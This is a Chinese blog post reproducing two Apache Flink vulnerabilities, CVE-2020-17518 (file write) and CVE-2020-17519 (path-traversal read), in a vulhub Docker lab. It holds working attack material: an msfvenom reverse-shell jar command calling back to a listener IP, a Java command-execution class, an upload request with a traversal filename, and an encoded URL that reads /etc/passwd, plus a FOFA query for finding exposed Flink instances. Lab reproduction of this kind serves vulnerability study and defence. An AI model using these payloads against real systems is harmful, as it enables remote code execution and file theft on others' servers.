S1xHcL's Blog.

CVE-2020-17518/17519复现

CVE
Word count: 703Reading time: 3 min
2021/02/09 Share

漏洞描述

Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致目录遍历和任意文件写入漏洞。

CVE-2020-17518

通过构造恶意的HTTP Header,可实现远程文件写入

CVE-2020-17519

攻击者可通过REST API使用../跳目录实现系统任意文件读取

影响版本

CVE-2020-17518

Apache Flink 1.5.1 ~ 1.11.2

CVE-2020-17519

Apache Flink 1.11.0、1.11.1、1.11.2

FOFA

app=”Apache-Flink”

安装环境

直接vulhub拉取,启动环境

1
docker-compose up -d

漏洞复现

准备jar包

可直接使用msf生成jar包然后上传,开启监听后反弹shell

1
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.88.130 LPORT=8888 -f jar > exp.jar

从CVE-2020-17518到一键Getshell

我们这里直接拿来表哥的源码进行打包,后续可直接getshell,但目前执行命令存在问题,等随后编写相关脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import java.io.File;
import java.util.Scanner;

public class Execute {
    public Execute() {
    }

    public static void main(String[] args) throws Exception {
        String o = "";
        String cmd = args[0];
        ProcessBuilder p;
        if (System.getProperty("os.name").toLowerCase().contains("win")) {
            p = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
        } else {
            String pty = "/bin/sh";
            if ((new File("/bin/bash")).exists()) {
                pty = "/bin/bash";
            }
            p = new ProcessBuilder(new String[]{pty, "-c", cmd});
        }

        Process s = p.start();
        Scanner c = (new Scanner(s.getInputStream())).useDelimiter("\\A");
        c.close();
    }
}

jar包命名为Execute.java,编译该文件

javac Execute.java

将编译后的Execute.class文件打包成jar

jar -cvf exp.jar Execute.class

c表示要创建一个新的jar包
v表示创建的过程中在控制台输出创建过程的一些信息
f表示给生成的jar包命名

CVE-2020-17518

找到上传点,点击Add new抓包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /jars/upload HTTP/1.1
Host: 192.168.88.130:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36/8mqQhSuL-09
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------85199222835071541373907992931
Content-Length: 262
Origin: http://192.168.88.130:8081
Connection: close
Referer: http://192.168.88.130:8081/

-----------------------------85199222835071541373907992931
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../tmp/test"
Content-Type: application/octet-stream

success
-----------------------------85199222835071541373907992931--

虽然报错为400,但我们还是将文件上传到了指定目录下,进入docker查看

1
2
3
docker ps
docker exec -it "docker ID" /bin/bash
cd /tmp

CVE-2020-17519

1
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

可直接读文件

尝试读取我们前面上传的/tmp/test文件

引用

Author:S1xHcL

原文链接:https://s1xhcl.github.io/2021/02/09/CVE-2020-17518-17519%E5%A4%8D%E7%8E%B0/

发表日期:February 9th 2021, 12:00:19 am

更新日期:February 9th 2021, 1:27:54 am

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 漏洞描述
    1. 1.1. CVE-2020-17518
    2. 1.2. CVE-2020-17519
  2. 2. 影响版本
    1. 2.1. CVE-2020-17518
    2. 2.2. CVE-2020-17519
  3. 3. FOFA
  4. 4. 安装环境
  5. 5. 漏洞复现
    1. 5.1. 准备jar包
    2. 5.2. CVE-2020-17518
    3. 5.3. CVE-2020-17519
  6. 6. 引用
Total : 46
2024
2023
2022
2021
2019
HW CVE Tools learn Struts Python Windows code InterView Learn PHP Audit Pentest ThinkPHP RCE Sql Windows认证 Kerberos sqlmap sql POC Work OA
POC CVE Audit CVE/EXP CVE/POC C Audit/Java learn Audit/PHP Vul Tips 内网学习 tools bypass POC/YAKIT Pentest 0Day mark